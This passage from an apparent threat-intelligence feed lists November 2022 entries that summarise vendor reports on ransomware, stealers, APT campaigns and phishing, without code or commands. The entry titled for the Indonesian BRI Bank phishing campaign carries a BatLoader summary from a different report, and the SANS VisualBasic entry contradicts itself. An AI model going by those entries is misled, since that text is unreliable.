Researchers from Cofense have observed phishing campaigns abusing Microsoft Customer Voice URLs. Microsoft Customer Voice is a customer engagement/survey service that is used for plenty of benign and useful reasons.
Source: https://cofense.com/blog/microsoft-customer-voice-urls-used-in-latest-phishing-campaign
2022-11-17
An_Examination_of_Wiper_Families
LOW
+
Intel Source:
Trellix
Intel Name:
An_Examination_of_Wiper_Families
Date of Scan:
2022-11-17
Impact:
LOW
Summary:
Researchers from Trellix have analyzed more than twenty recent wiper families, their trends, techniques, and their overlap with other wipers.
Source: https://www.trellix.com/en-us/about/newsroom/stories/research/wipermania-an-all-you-can-wipe-buffet.html
2022-11-17
Advantage_of_FTX_Bankruptcy_by_threat_actors
LOW
+
Intel Source:
McAfee
Intel Name:
Advantage_of_FTX_Bankruptcy_by_threat_actors
Date of Scan:
2022-11-17
Impact:
LOW
Summary:
McAfee has discovered several phishing sites targeting FTX users. One of the sites discovered was registered on the 15th of November and asks users to submit their crypto wallet phrase to receive a refund. After entering this phrase, the creators of the site would gain access to the victim’s crypto wallet and they would likely transfer all the funds out of it.
Source: https://www.mcafee.com/blogs/other-blogs/mcafee-labs/threat-actors-taking-advantage-of-ftx-bankruptcy/
2022-11-17
Debugging_DotNET_Malware
MEDIUM
+
Intel Source:
Fortinet
Intel Name:
Debugging_DotNET_Malware
Date of Scan:
2022-11-17
Impact:
MEDIUM
Summary:
Researchers from Fortinet have described how to create a custom .NET program to help debug a DLL loaded and invoked directly in memory.
Source: https://www.fortinet.com/blog/threat-research/debugging-net-malware-in-a-multi-stage-malware-deployment
2022-11-17
ARCrypter_Ransomware_Spreading_From_Latin_America_to_the_World
MEDIUM
+
Intel Source:
Blackberry
Intel Name:
ARCrypter_Ransomware_Spreading_From_Latin_America_to_the_World
Date of Scan:
2022-11-17
Impact:
MEDIUM
Summary:
Researchers from BlackBerry have identified additional samples of interest for ARCrypter ransomware, which has expanded its operations from Latin America to the world. Based on the unique strings identified during the analysis, they named this previously unknown ransomware variant "ARCrypter".
Source: https://blogs.blackberry.com/en/2022/11/arcrypter-ransomware-expands-its-operations-from-latin-america-to-the-world
2022-11-17
WatchDog_Continues_to_Targeting_East_Asian_CSPs
LOW
+
Intel Source:
CADO Security
Intel Name:
WatchDog_Continues_to_Targeting_East_Asian_CSPs
Date of Scan:
2022-11-17
Impact:
LOW
Summary:
Researchers from Cado Labs have discovered the re-emergence of the threat actor WatchDog. This is an opportunistic and prominent threat actor, who is known for routinely carrying out cryptojacking attacks against resources hosted by various Cloud Service Providers.
Source: https://www.cadosecurity.com/watchdog-continues-to-target-east-asian-csps/
2022-11-17
Diving_Deep_into_Venus_Ransomware
LOW
+
Intel Source:
SentinelOne
Intel Name:
Diving_Deep_into_Venus_Ransomware
Date of Scan:
2022-11-17
Impact:
LOW
Summary:
Researchers from SentinelOne have analyzed the Venus ransomware and provided further analysis, indicators of compromise, and TTPs.
Source: https://www.sentinelone.com/blog/venus-ransomware-zeoticus-spin-off-shows-sophistication-isnt-necessary-for-success/
2022-11-16
Emotet_Delivering_via_Malicious_Email
MEDIUM
+
Intel Source:
Proofpoint
Intel Name:
Emotet_Delivering_via_Malicious_Email
Date of Scan:
2022-11-16
Impact:
MEDIUM
Summary:
Researchers from Proofpoint have observed multiple changes to Emotet and its payloads including the lures used, and changes to the Emotet modules, loader, and packer.
Source: https://www.proofpoint.com/us/blog/threat-insight/comprehensive-look-emotets-fall-2022-return
2022-11-16
Diving_Deep_into_Downloader_Malware
LOW
+
Intel Source:
Vmware
Intel Name:
Diving_Deep_into_Downloader_Malware
Date of Scan:
2022-11-16
Impact:
LOW
Summary:
Researchers from VMware have analyzed the evasive downloader malware campaigns, addressing the history of BatLoader, its attributes, how it is delivered, the infection chain, and Carbon Black’s detection of the malware.
Source: https://blogs.vmware.com/security/2022/11/batloader-the-evasive-downloader-malware.html
2022-11-16
Active_IOCs_of_Heodo_Malware
LOW
+
Intel Source:
Rewterz
Intel Name:
Active_IOCs_of_Heodo_Malware
Date of Scan:
2022-11-16
Impact:
LOW
Summary:
Researchers from Rewterz have identified the active IOCs of Heodo Malware. It is a malicious program that is a variant of Emotet.
Source: https://www.rewterz.com/rewterz-news/rewterz-threat-alert-an-emerging-heodo-malware-active-iocs
2022-11-16
Typhon_Stealer_Back_With_New_Capabilities
LOW
+
Intel Source:
PaloAlto
Intel Name:
Typhon_Stealer_Back_With_New_Capabilities
Date of Scan:
2022-11-16
Impact:
LOW
Summary:
Researchers from PaloAlto have identified that Typhon Stealer provides threat actors with an easy-to-use, configurable builder for hire. They are continuing to update their code to enhance their tools and techniques to evade security systems and exfiltrate data smoothly.
Source: https://unit42.paloaltonetworks.com/typhon-reborn-stealer/
2022-11-16
The_HTTP_CONNECT_malicious_requests
LOW
+
Intel Source:
ISC.SANS
Intel Name:
The_HTTP_CONNECT_malicious_requests
Date of Scan:
2022-11-16
Impact:
LOW
Summary:
Researchers from SANS have analyzed HTTP CONNECT requests that may have been an attempt to relay traffic through the honeypot and hide the original source of the request. It is also possible that the traffic was funneled through multiple proxy endpoints to make the source difficult to identify. Allowing HTTP CONNECT on internet-facing resources can potentially expose internal network resources or assist in the forwarding of malicious traffic.
Source: https://isc.sans.edu/diary/rss/29246
2022-11-16
North_Korean_hackers_target_European_organization
LOW
+
Intel Source:
Securelist
Intel Name:
North_Korean_hackers_target_European_organization
Date of Scan:
2022-11-16
Impact:
LOW
Summary:
Researchers from Securelist have identified that North Korean hackers are using a new version of the DTrack backdoor to attack organizations in Europe and Latin America.
Source: https://securelist.com/dtrack-targeting-europe-latin-america/107798/
2022-11-16
Iranian_hackers_breached_federal_agency_using_Log4Shell_exploit
HIGH
+
Intel Source:
CISA
Intel Name:
Iranian_hackers_breached_federal_agency_using_Log4Shell_exploit
Date of Scan:
2022-11-16
Impact:
HIGH
Summary:
The FBI and CISA revealed in a joint advisory published today that an unnamed Iranian-backed threat group hacked a Federal Civilian Executive Branch (FCEB) organization to deploy XMRig cryptomining malware.
Source: https://www.cisa.gov/uscert/ncas/current-activity/2022/11/16/cisa-and-fbi-release-advisory-iranian-government-sponsored-apt
2022-11-16
New_RapperBot_Campaign
MEDIUM
+
Intel Source:
Fortinet
Intel Name:
New_RapperBot_Campaign
Date of Scan:
2022-11-16
Impact:
MEDIUM
Summary:
Fortinet researchers observed new samples with the same distinctive C2 protocol used by RapperBot. In August 2022, there was a significant drop in the number of samples collected in the wild. It quickly became evident that these samples are part of a separate campaign to launch Distributed Denial of Service (DDoS) attacks against game servers. Given the several similarities between the previous and present campaigns, it is believed that either the same threat actor is behind both or each campaign branched from the same privately shared source code.
Source: https://www.fortinet.com/blog/threat-research/new-rapperbot-campaign-ddos-attacks
2022-11-16
Dagon_Locker_Ransomware_Distributing_in_Korea
LOW
+
Intel Source:
ASEC
Intel Name:
Dagon_Locker_Ransomware_Distributing_in_Korea
Date of Scan:
2022-11-16
Impact:
LOW
Summary:
ASEC researchers have discovered that the DAGON LOCKER ransomware is being distributed in Korea. It is commonly distributed through phishing emails or as an email attachment, but because it is a ransomware-as-a-service, the distribution route and target can vary according to the threat actor.
Source: https://asec.ahnlab.com/en/42037/
2022-11-15
Chinese_Hackers_Targeting_Government_Agencies
MEDIUM
+
Intel Source:
Symantec
Intel Name:
Chinese_Hackers_Targeting_Government_Agencies
Date of Scan:
2022-11-15
Impact:
MEDIUM
Summary:
Researchers from Symantec have identified that a cyberespionage threat actor tracked as Billbug (a.k.a. Thrip, Lotus Blossom, Spring Dragon) has been running a campaign targeting a certificate authority, government agencies, and defense organizations in several countries in Asia.
Source: https://symantec-enterprise-blogs.security.com/blogs/threat-intelligence/espionage-asia-governments-cert-authority
2022-11-15
Active_IOCs_of_SharpPanda_APT_Group
MEDIUM
+
Intel Source:
Rewterz
Intel Name:
Active_IOCs_of_SharpPanda_APT_Group
Date of Scan:
2022-11-15
Impact:
MEDIUM
Summary:
Researchers from Rewterz have identified the active IOCs of the SharpPanda APT group. SharpPanda APT targets Southeast Asian government users with template injection of malicious documents. The attackers use spear-phishing to gain initial access and leverage old Microsoft Office vulnerabilities together with a chain of in-memory loaders to attempt to install a previously unknown backdoor on the victims' machines.
Source: https://www.rewterz.com/rewterz-news/rewterz-threat-alert-sharppanda-apt-group-active-iocs
2022-11-15
Indonesian_BRI_Bank_targeted_by_phishing_campaigns
LOW
+
Intel Source:
Cyble
Intel Name:
Indonesian_BRI_Bank_targeted_by_phishing_campaigns
Date of Scan:
2022-11-15
Impact:
LOW
Summary:
VMware Carbon Black Managed Detection and Response (MDR) analysts have identified a threat that has been circulating over the last couple of months: BatLoader. BatLoader is an initial access malware that heavily uses batch and PowerShell scripts to gain a foothold on a victim machine and deliver other malware. The analysts shared their analysis of this malware campaign, addressing the history of BatLoader, its attributes, how it is delivered, the infection chain, and Carbon Black's detection of the malware.
Source: https://blog.cyble.com/2022/11/15/phishing-campaign-targeting-indonesian-bri-bank-using-sms-stealer/
2022-11-15
Hackers_Abusing_LNK_Files
LOW
+
Intel Source:
Intezer
Intel Name:
Hackers_Abusing_LNK_Files
Date of Scan:
2022-11-15
Impact:
LOW
Summary:
Intezer researchers have described how threat actors use LNK files in the different stages of attacks.
Source: https://www.intezer.com/blog/malware-analysis/how-threat-actors-abuse-lnk-files/
2022-11-15
New_Earth_Longzhi_APT_Targeting_Ukraine_and_Asian_Countries
LOW
+
Intel Source:
TrendMicro
Intel Name:
New_Earth_Longzhi_APT_Targeting_Ukraine_and_Asian_Countries
Date of Scan:
2022-11-15
Impact:
LOW
Summary:
Researchers from Trend Micro have observed that the threat group Earth Longzhi is targeting Ukraine and Asian countries with custom Cobalt Strike loaders.
Source: https://www.trendmicro.com/en_us/research/22/k/hack-the-real-box-apt41-new-subgroup-earth-longzhi.html
2022-11-15
A_Deep_Examination_of_Prestige_Ransomware
LOW
+
Intel Source:
Cyfirma
Intel Name:
A_Deep_Examination_of_Prestige_Ransomware
Date of Scan:
2022-11-15
Impact:
LOW
Summary:
Researchers from Cyfirma have analyzed the Prestige Ransomware.
Source: https://www.cyfirma.com/outofband/prestige-ransomware-analysis/
2022-11-15
Active_IOCs_of_Black_Basta_Ransomware
LOW
+
Intel Source:
Rewterz
Intel Name:
Active_IOCs_of_Black_Basta_Ransomware
Date of Scan:
2022-11-15
Impact:
LOW
Summary:
Researchers from Rewterz have identified the active IOCs of Black Basta Ransomware. It is a new ransomware that encrypts data stored on clients’ hard drives.
Source: https://www.rewterz.com/rewterz-news/rewterz-threat-alert-black-basta-ransomware-active-iocs-5
2022-11-15
Active_IOCs_of_Phobos_Ransomware
LOW
+
Intel Source:
Rewterz
Intel Name:
Active_IOCs_of_Phobos_Ransomware
Date of Scan:
2022-11-15
Impact:
LOW
Summary:
Researchers from Rewterz have identified the active IOCs of Phobos ransomware. It is based on the Dharma malware that first appeared at the beginning of 2019.
Source: https://www.rewterz.com/rewterz-news/rewterz-threat-alert-phobos-ransomware-active-iocs-27
2022-11-15
Active_IOCs_of_REvil_Ransomware
LOW
+
Intel Source:
Rewterz
Intel Name:
Active_IOCs_of_REvil_Ransomware
Date of Scan:
2022-11-15
Impact:
LOW
Summary:
Researchers from Rewterz have identified the active IOCs of REvil ransomware. It (also known as Sodinokibi) is a Ransomware-as-a-Service (RaaS).
Source: https://www.rewterz.com/rewterz-news/rewterz-threat-alert-revil-ransomware-active-iocs-20
2022-11-15
Hackers_Leveraging_BumbleBee_to_Load_Meterpreter_and_CobaltStrike
LOW
+
Intel Source:
DFIR Report
Intel Name:
Hackers_Leveraging_BumbleBee_to_Load_Meterpreter_and_CobaltStrike
Date of Scan:
2022-11-15
Impact:
LOW
Summary:
Researchers from The DFIR Report have identified that threat actors leveraged BumbleBee to load a Meterpreter agent and Cobalt Strike Beacons.
Source: https://thedfirreport.com/2022/11/14/bumblebee-zeros-in-on-meterpreter/
2022-11-14
StrelaStealer_and_IceXLoader_Drive_InfoStealing_Campaigns
LOW
+
Intel Source:
DCSO CyTec Blog
Intel Name:
StrelaStealer_and_IceXLoader_Drive_InfoStealing_Campaigns
Date of Scan:
2022-11-14
Impact:
LOW
Summary:
Researchers from DCSO CyTec have discovered new waves of malware campaigns, with two information-stealing malware families making the rounds in the wild. Named StrelaStealer and IceXLoader, both leverage malicious email attachments to lure their targets.
Source: https://medium.com/@DCSO_CyTec/shortandmalicious-strelastealer-aims-for-mail-credentials-a4c3e78c8abc
2022-11-14
Massive_oisDOTis_Black_Hat_Redirect_Malware_Campaign
LOW
+
Intel Source:
Sucuri
Intel Name:
Massive_oisDOTis_Black_Hat_Redirect_Malware_Campaign
Date of Scan:
2022-11-14
Impact:
LOW
Summary:
Researchers from Sucuri have identified a black hat redirect malware campaign involving ois[.]is. These malicious redirects appear to be designed to increase the authority of the attacker's sites for search engines.
Source: https://blog.sucuri.net/2022/11/massive-ois-is-black-hat-redirect-malware-campaign.html
2022-11-14
Cyber_adoption_of_IPFS_for_different_malware_campaigns
LOW
+
Intel Source:
Talos
Intel Name:
Cyber_adoption_of_IPFS_for_different_malware_campaigns
Date of Scan:
2022-11-14
Impact:
LOW
Summary:
Cisco Talos has observed multiple ongoing campaigns that leverage the IPFS network to host their malware payloads and phishing kit infrastructure while facilitating other attacks.
Source: https://blog.talosintelligence.com/ipfs-abuse/
2022-11-14
New_KmsdBot_Malware_Hijacking_Systems
LOW
+
Intel Source:
Akamai
Intel Name:
New_KmsdBot_Malware_Hijacking_Systems
Date of Scan:
2022-11-14
Impact:
LOW
Summary:
Researchers from Akamai have identified a newly discovered evasive malware that leverages the Secure Shell (SSH) cryptographic protocol to gain entry into targeted systems with the goal of mining cryptocurrency and carrying out distributed denial-of-service (DDoS) attacks.
Source: https://www.akamai.com/blog/security-research/kmdsbot-the-attack-and-mine-malware
2022-11-14
Dropper_Type_Malware_Bomb_Back_Again
LOW
+
Intel Source:
ASEC
Intel Name:
Dropper_Type_Malware_Bomb_Back_Again
Date of Scan:
2022-11-14
Impact:
LOW
Summary:
ASEC researchers found that dropper malware, which disguised itself as a crack, is being actively distributed again. Once the malware is executed, the affected system becomes infected with numerous malware programs.
Source: https://asec.ahnlab.com/en/41972/
2022-11-14
QBOT_Leveraging_HTML_Smuggling_Technique
LOW
+
Intel Source:
QuickHeal
Intel Name:
QBOT_Leveraging_HTML_Smuggling_Technique
Date of Scan:
2022-11-14
Impact:
LOW
Summary:
Researchers from QuickHeal have observed a new technique that QBot leverages for its attack. It is called an “HTML Smuggling attack.”
Source: https://blogs.quickheal.com/qbot-a-html-smuggling-technique-to-target-victims/
2022-11-11
UAC-0118_Group_Using_Somnia_Malware
MEDIUM
+
Intel Source:
CERT-UA
Intel Name:
UAC-0118_Group_Using_Somnia_Malware
Date of Scan:
2022-11-11
Impact:
MEDIUM
Summary:
Researchers from CERT-UA have investigated threat group FRwL (aka Z-Team) and found that the initial compromise occurred as a result of downloading and running a file that mimicked the "Advanced IP Scanner" software, but actually contained the Vidar malware.
Source: https://cert.gov.ua/article/2724253
2022-11-11
Magniber_Ransomware_Bypassing_MOTW
LOW
+
Intel Source:
ASEC
Intel Name:
Magniber_Ransomware_Bypassing_MOTW
Date of Scan:
2022-11-11
Impact:
LOW
Summary:
ASEC researchers have observed that the script format found from September 8th to September 29th, 2022, bypassed Mark of the Web (MOTW), a feature offered by Microsoft that identifies the source of files.
Source: https://asec.ahnlab.com/en/41889/
2022-11-10
Another_malicious_VisualBasic_script
LOW
+
Intel Source:
ISC.SANS
Intel Name:
Another_malicious_VisualBasic_script
Date of Scan:
2022-11-10
Impact:
LOW
Summary:
Researchers from SANS have identified a malicious VisualBasic script that attracted their attention. It's not flagged as malicious but, even more, it's reported as a simple malicious script.
Source: https://isc.sans.edu/diary/Another%20Script-Based%20Ransomware/29234
2022-11-10
The_deep_details_of_Cloud9_Chrome_Botnet
LOW
+
Intel Source:
Zimperium
Intel Name:
The_deep_details_of_Cloud9_Chrome_Botnet
Date of Scan:
2022-11-10
Impact:
LOW
Summary:
Zimperium Labs researchers recently discovered a malicious browser extension that steals the information available during the browser session, installs malware on a user's device, and subsequently assumes control of the entire device. The team provided a deeper analysis of the architecture and modus operandi of this malicious browser extension, originally called Cloud9 by the malware author.
Source: https://www.zimperium.com/blog/the-case-of-cloud9-chrome-botnet/
2022-11-10
The_return_of_Emotet_targeting_users_worldwide
HIGH
+
Intel Source:
Cyble
Intel Name:
The_return_of_Emotet_targeting_users_worldwide
Date of Scan:
2022-11-10
Impact:
HIGH
Summary:
Cyble Research and Intelligence Labs (CRIL) observed the recent Emotet spam campaign spreading malicious xls, xlsm, and password-protected zip files as attachments to infect users. These office documents contain malicious macro code which downloads the actual Emotet binary from the remote server. Cyble intelligence shows that the recent Emotet campaign is widespread worldwide, targeting 40 countries. This latest strain is spreading Bumblebee and IcedID malware.
Source: https://blog.cyble.com/2022/11/09/emotet-returns-targeting-users-worldwide/
2022-11-09
The_analyses_of_Black_Hat_redirect_campaign
LOW
+
Intel Source:
Sucuri
Intel Name:
The_analyses_of_Black_Hat_redirect_campaign
Date of Scan:
2022-11-09
Impact:
LOW
Summary:
The Sucuri research team has tracked a surge in WordPress malware redirecting website visitors to attackers' fake sites. They presented their analysis of what this infection does and how the malicious redirects work.
Source: https://blog.sucuri.net/2022/11/massive-ois-is-black-hat-redirect-malware-campaign.html
2022-11-09
Diving_Deep_into_DeimosC2_C&C_Framework
LOW
+
Intel Source:
TrendMicro
Intel Name:
Diving_Deep_into_DeimosC2_C&C_Framework
Date of Scan:
2022-11-09
Impact:
LOW
Summary:
Researchers from TrendMicro have analyzed the technical details of DeimosC2 C&C framework.
Source: https://www.trendmicro.com/en_us/research/22/k/deimosc2-what-soc-analysts-and-incident-responders-need-to-know.html
2022-11-09
The_distribution_of_LockBit_3.0_Being_Distributed_by_Amadey_Bot
MEDIUM
+
Intel Source:
ASEC
Intel Name:
The_distribution_of_LockBit_3.0_Being_Distributed_by_Amadey_Bot
Date of Scan:
2022-11-09
Impact:
MEDIUM
Summary:
The ASEC analysis team has observed and confirmed that attackers are using Amadey Bot to install LockBit. Amadey Bot, a malware that was first discovered in 2018, is capable of stealing information and installing additional malware by receiving commands from the attacker.
Source: https://asec.ahnlab.com/en/41450/
2022-11-09
FormBook_stealer
LOW
+
Intel Source:
Any.Run
Intel Name:
FormBook_stealer
Date of Scan:
2022-11-09
Impact:
LOW
Summary:
The Any.Run malware analysis service allows analysts to take an in-depth look at the behavior of this clever virus and other malware such as Dridex and Lokibot with their elaborate anti-evasion techniques.
Source: https://any.run/malware-trends/formbook
2022-11-09
The_analyses_of_malicious_use_of_multiple_intermittent_.NET_binaries
LOW
+
Intel Source:
Fortinet
Intel Name:
The_analyses_of_malicious_use_of_multiple_intermittent_.NET_binaries
Date of Scan:
2022-11-09
Impact:
LOW
Summary:
FortiGuard Labs recently analyzed a fake phishing email that drops the Warzone RAT and showed that it does so using multiple intermittent .NET binaries that are increasingly obfuscated.
Source: https://www.fortinet.com/blog/threat-research/tips-and-tricks-using-the-net-obfuscator-against-itself
2022-11-09
The_repeated_use_of_DLL-hijack_execution
LOW
+
Intel Source:
Sophos
Intel Name:
The_repeated_use_of_DLL-hijack_execution
Date of Scan:
2022-11-09
Impact:
LOW
Summary:
Sophos researchers have observed multiple attacks targeting government organizations in Asia involving DLL sideloading, one of the most common techniques of China-based APT groups. They shared evidence of the connection between the incidents and showed how threat actors base their attacks on well-known, effective techniques, adding complexity and variation over time.
Source: https://news.sophos.com/en-us/2022/11/03/family-tree-dll-sideloading-cases-may-be-related/
2022-11-09
A_new_updated_IceXLoader_malware
MEDIUM
+
Intel Source:
Minerva-labs
Intel Name:
A_new_updated_IceXLoader_malware
Date of Scan:
2022-11-09
Impact:
MEDIUM
Summary:
IceXLoader was discovered earlier this year. It is a commercial malware used to download and deploy additional malware on infected machines. While the version discovered in June was v3.0, Minerva Labs researchers recently observed a newer v3.3.3 loader which looks to be fully functional and includes a multi-stage delivery chain.
Source: https://minerva-labs.com/blog/new-updated-icexloader-claims-thousands-of-victims-around-the-world/
2022-11-09
Modified_Chaos_Ransomware_Killnet_in_the_wild
MEDIUM
+
Intel Source:
Cyble
Intel Name:
Modified_Chaos_Ransomware_Killnet_in_the_wild
Date of Scan:
2022-11-09
Impact:
MEDIUM
Summary:
Researchers from Cyble discovered data-destructive ransomware related to the pro-Russian threat actor (TA) organization "Killnet". The ransomware drops a note directing victims to a Telegram page for supporting Russian hacktivists. The ransomware is seen targeting multiple adversaries across the globe.
Source: https://blog.cyble.com/2022/11/08/pro-russian-hacktivists-targeting-adversaries-with-killnet-ransomware/
2022-11-09
Raccoon_stealer_2.0_malware_analysis
LOW
+
Intel Source:
Any.Run
Intel Name:
Raccoon_stealer_2.0_malware_analysis
Date of Scan:
2022-11-09
Impact:
LOW
Summary:
The Any.Run analysts triaged multiple Raccoon stealer V2 samples, collected typical behavior activities, and briefly described its execution process. They also provided a deeper and more detailed Raccoon stealer 2.0 malware analysis to follow all steps and get a complete picture of the info stealer's behavior.
Source: https://thehackernews.com/2022/11/inside-raccoon-stealer-v2.html https://any.run/malware-trends/raccoon?utm_source=hacker_news&utm_medium=article&utm_campaign=raccoon&utm_content=mtt
2022-11-08
Crimson_Kingsnake_threat_impersonation
LOW
+
Intel Source:
AbnormalSecurity
Intel Name:
Crimson_Kingsnake_threat_impersonation
Date of Scan:
2022-11-08
Impact:
LOW
Summary:
The researchers discovered a new BEC group that uses impersonation tactics to swindle companies around the world. The group, called Crimson Kingsnake, impersonates real attorneys, law firms, and debt recovery services to deceive accounting professionals into quickly paying bogus invoices. They also observed Crimson Kingsnake targeting companies throughout the United States, Europe, the Middle East, and Australia.
Source: https://abnormalsecurity.com/blog/crimson-kingsnake-bec-group-attacks
2022-11-08
The_expansion_of_SocGholish_malware
LOW
+
Intel Source:
SentinelOne
Intel Name:
The_expansion_of_SocGholish_malware
Date of Scan:
2022-11-08
Impact:
LOW
Summary:
Researchers from SentinelOne discovered that the SocGholish operators are expanding their infrastructure for staging malware with new servers. This helps the operators to counter defensive operations against known servers and scale up their operation.
Source: https://www.sentinelone.com/labs/socgholish-diversifies-and-expands-its-malware-staging-infrastructure-to-counter-defenders/
2022-11-07
Remcos_Downloader_with_Unicode_Obfuscation
LOW
+
Intel Source:
ISC.SANS
Intel Name:
Remcos_Downloader_with_Unicode_Obfuscation
Date of Scan:
2022-11-07
Impact:
LOW
Summary:
Researchers from SANS have analyzed a malicious RAR archive containing a VBS script. It was called "Unidad judicial citacion pendiente Fiscalia.rar" and protected with a simple 4-digit password to defeat automatic scanning. The same name appears inside the VBS script.
Source: https://isc.sans.edu/diary/rss/29220
2022-11-07
Windows_Malware_with_VHD_Extension
LOW
+
Intel Source:
ISC.SANS
Intel Name:
Windows_Malware_with_VHD_Extension
Date of Scan:
2022-11-07
Impact:
LOW
Summary:
Researchers from SANS have analyzed a phishing email with an attachment and found that the attachment was presented as a PDF but is in fact a VHD file.
Source: https://isc.sans.edu/diary/Windows+Malware+with+VHD+Extension/29222/
2022-11-07
Robin_Banks_Phishing_Service_Back_to_Steal_Banking_Accounts
LOW
+
Intel Source:
IronNet
Intel Name:
Robin_Banks_Phishing_Service_Back_to_Steal_Banking_Accounts
Date of Scan:
2022-11-07
Impact:
LOW
Summary:
Researchers from IronNet have identified that the Robin Banks phishing-as-a-service (PhaaS) platform is back in action with infrastructure hosted by a Russian internet company that offers protection against distributed denial-of-service (DDoS) attacks.
Source: https://www.ironnet.com/blog/robin-banks-still-might-be-robbing-your-bank-part-2
2022-11-07
APT36_Targeting_Indian_Governmental_Organizations
MEDIUM
+
Intel Source:
Zscaler
Intel Name:
APT36_Targeting_Indian_Governmental_Organizations
Date of Scan:
2022-11-07
Impact:
MEDIUM
Summary:
According to Zscaler researchers, APT-36 (also known as Transparent Tribe) targets users working at Indian government organizations with updated TTPs and tools.
Source: https://www.zscaler.com/blogs/security-research/apt-36-uses-new-ttps-and-new-tools-target-indian-governmental-organizations
2022-11-04
New_Laplas_Clipper_Malware_distributed_through_SmokeLoader
LOW
+
Intel Source:
Cyble
Intel Name:
New_Laplas_Clipper_Malware_distributed_through_SmokeLoader
Date of Scan:
2022-11-04
Impact:
LOW
Summary:
Researchers from Cyble identified a new attack technique leveraging SmokeLoader to load various malware into target systems compromised through spam emails. The campaign seems to be highly active in the wild, using Laplas Clipper to target cryptocurrency users.
Source: https://blog.cyble.com/2022/11/02/new-laplas-clipper-distributed-by-smokeloader/
2022-11-04
The_threat_actor_RomCom_new_attacks
LOW
+
Intel Source:
Blackberry
Intel Name:
The_threat_actor_RomCom_new_attacks
Date of Scan:
2022-11-04
Impact:
LOW
Summary:
The BlackBerry Threat Research and Intelligence team shed light on RomCom's new attack campaigns, which spoof legitimate network scanning tools through phishing and spoofed domains targeting Ukraine and English-speaking countries, delivering the RomCom RAT.
Source: https://blogs.blackberry.com/en/2022/11/romcom-spoofing-solarwinds-keepass
2022-11-04
Apache_Commons_Text4Shell_Vulnerability
MEDIUM
+
Intel Source:
Securonix
Intel Name:
Apache_Commons_Text4Shell_Vulnerability
Date of Scan:
2022-11-04
Impact:
MEDIUM
Summary:
Securonix researchers have analyzed the Apache Commons Text library vulnerability that is currently being exploited. On October 13, Apache Software Foundation was notified of a Text4shell vulnerability affecting versions 1.5 to 1.9. It has been patched in version 1.10.0.
Source: https://www.securonix.com/blog/apache-commons-text4shell/
2022-11-04
OPERA1ER_APT_Hackers_attacks
LOW
+
Intel Source:
Group-IB
Intel Name:
OPERA1ER_APT_Hackers_attacks
Date of Scan:
2022-11-04
Impact:
LOW
Summary:
Researchers from Group-IB have identified that a French-speaking threat actor named OPERA1ER has been linked to a series of more than 30 successful cyber attacks aimed at banks, financial services, and telecom companies across Africa, Asia, and Latin America between 2018 and 2022.
Source: https://blog.group-ib.com/opera1er-apt
2022-11-04
New_Black_Basta_Ransomware_Tools_and_tactics
LOW
+
Intel Source:
SentinelOne
Intel Name:
New_Black_Basta_Ransomware_Tools_and_tactics
Date of Scan:
2022-11-04
Impact:
LOW
Summary:
SentinelLabs researchers shed light in depth on the operational TTPs of the highly evasive Black Basta ransomware, which they link to FIN7 or one of its developers, exposing previously undiscovered tools and tactics.
Source: https://www.sentinelone.com/labs/black-basta-ransomware-attacks-deploy-custom-edr-evasion-tools-tied-to-fin7-threat-actor/
2022-11-04
Raise_in_Chromeloader_Malware_attacks
LOW
+
Intel Source:
ESentire
Intel Name:
Raise_in_Chromeloader_Malware_attacks
Date of Scan:
2022-11-04
Impact:
LOW
Summary:
Researchers from ESentire discovered the latest traces of Chromeloader malware being spread in the wild. The malware appears more persistent and seeks higher permissions on the target's system.
Source: https://www.esentire.com/blog/chromeloader-observations-on-the-rise
2022-11-04
Ransomware_targeting_ESXi
LOW
+
Intel Source:
VMware
Intel Name:
Ransomware_targeting_ESXi
Date of Scan:
2022-11-04
Impact:
LOW
Summary:
Researchers from VMware's Threat Analysis Team shared details about various ransomware families targeting enterprises that leverage VMware ESXi, along with their techniques and tactics.
Source: https://blogs.vmware.com/security/2022/10/esxi-targeting-ransomware-tactics-and-techniques-part-2.html
2022-11-03
Elbie_Ransomware_Distributing_in_Korea
LOW
+
Intel Source:
ASEC
Intel Name:
Elbie_Ransomware_Distributing_in_Korea
Date of Scan:
2022-11-03
Impact:
LOW
Summary:
Using internal monitoring, ASEC researchers have discovered that ieinstal.exe is being used in the distribution of Elbie ransomware.
Source: https://asec.ahnlab.com/en/40907/
2022-11-03
Appleseed_Malware_Spreading_to_Nuclear_Power_Plant_Companies
LOW
+
Intel Source:
ASEC
Intel Name:
Appleseed_Malware_Spreading_to_Nuclear_Power_Plant_Companies
Date of Scan:
2022-11-03
Impact:
LOW
Summary:
Researchers from ASEC have discovered that AppleSeed has been distributed to nuclear power plant companies. Kimsuky, a North Korea-affiliated organization, is actively distributing AppleSeed, a backdoor malware, to many companies.
Source: https://asec.ahnlab.com/en/41015/
2022-11-03
The_observation_of_public_cloud_services_attacks
MEDIUM
+
Intel Source:
Securelist
Intel Name:
The_observation_of_public_cloud_services_attacks
Date of Scan:
2022-11-03
Impact:
MEDIUM
Summary:
Kaspersky has reported several incidents where attackers used cloud services for C&C. Their report describes several interesting server-side attacks, C&C in public clouds, and other MDR cases.
Source: https://securelist.com/server-side-attacks-cc-in-public-clouds-mdr-cases/107826/
2022-11-03
Ignoring_of_old_Wannacry_ransomware
MEDIUM
+
Intel Source:
SecurityAffairs
Intel Name:
Ignoring_of_old_Wannacry_ransomware
Date of Scan:
2022-11-03
Impact:
MEDIUM
Summary:
In May 2017, the world learned about a global security attack, the Wannacry ransomware, carried out through malicious code capable of encrypting data residing in information systems and demanding a ransom in cryptocurrency to restore it. That attack was considered the worst cyber attack in terms of contamination rate and scope, putting public offices and companies (especially healthcare facilities) out of operation. Despite this, some companies still have not learned the lesson and continue to ignore it.
Source: https://securityaffairs.co/wordpress/137894/cyber-crime/wannacry-hybrid-malware.html
2022-11-03
Cranefly_Hackers_Installing_Undocumented_Malware
LOW
+
Intel Source:
Symantec
Intel Name:
Cranefly_Hackers_Installing_Undocumented_Malware
Date of Scan:
2022-11-03
Impact:
LOW
Summary:
Symantec researchers have discovered that an unknown dropper is being used to install a new backdoor and other tools by reading commands from seemingly innocuous Internet Information Services (IIS) logs.
Source: https://symantec-enterprise-blogs.security.com/blogs/threat-intelligence/cranefly-new-tools-technique-geppei-danfuan
2022-11-03
Techniques_used_by_notorious_banking_Trojans
LOW
+
Intel Source:
PaloAlto
Intel Name:
Techniques_used_by_notorious_banking_Trojans
Date of Scan:
2022-11-03
Impact:
LOW
Summary:
